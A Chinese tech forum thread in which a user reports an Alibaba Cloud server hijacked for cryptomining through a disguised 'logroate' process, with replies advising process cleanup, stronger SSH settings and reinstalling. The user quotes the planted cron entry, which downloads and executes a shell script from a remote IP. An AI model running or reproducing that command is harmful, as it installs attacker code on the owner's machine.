Yoo趣儿

Yoo趣儿 探索分享 问与答 太可怕了,第一次碰到,阿里云服务器被人侵入用来挖矿了 ...

太可怕了,第一次碰到,阿里云服务器被人侵入用来挖矿了。。。。

查看 76|回复 7
作者:bigxianyu   
logroate 进程在狂刷 cpu , 不知道是什么侵入的( 这是最可怕的) ,太可恶了,可怕。。。。
bigxianyu
OP
  
然后阿里云告诉我说,你当前账号用的是免费版云安全中心,不支持病毒查杀。。。。
Canglin   
不过可以看是哪些进程,kill 掉后删除就好了,我也被弄过
Foxkeh   
只能检查下 SSH 和各种暴露到公网的弱密码, 安全组, 不明来源的软件或被爆出漏洞的第三方 Web 应用(尤其是用 root 权限运行的)
然后建议重装
tinyfry   
果断重装,不要开放一些不用的端口,密码强度要设置高一些,定期对组件进行升级。
bigxianyu
OP
  
@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) , 这是 cron 任务里被添加的东西
bigxianyu
OP
  
@Canglin 嗯,已经手动弄了,搜到了以前也有人被搞过
idragonet   
系统重新安装肯定的,SSH 只开启证书登录。
返回列表
您需要登录后才可以回帖 登录 | 立即注册

AD1

热门主题

热门板块

问与答分享发现分享创造奇思妙想分享邀请码商业推广优惠信息PythonPHPJavaJavaScriptNode.jsGo语言C++HTML

公告

标签|小黑屋|Yoo趣儿

GMT+8, 2024-11-22 17:37 , Processed in 0.012756 second(s), 11 queries , Gzip On, MemCached On.

Powered by Discuz! X3.2

The happiest thing in the world is to strive for an ideal.

返回顶部